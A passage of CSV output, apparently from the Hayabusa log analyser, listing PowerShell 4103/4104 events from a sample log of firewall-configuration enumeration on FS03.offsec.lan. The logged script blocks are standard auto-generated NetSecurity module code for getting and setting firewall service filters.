[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallServiceFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase1AuthSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
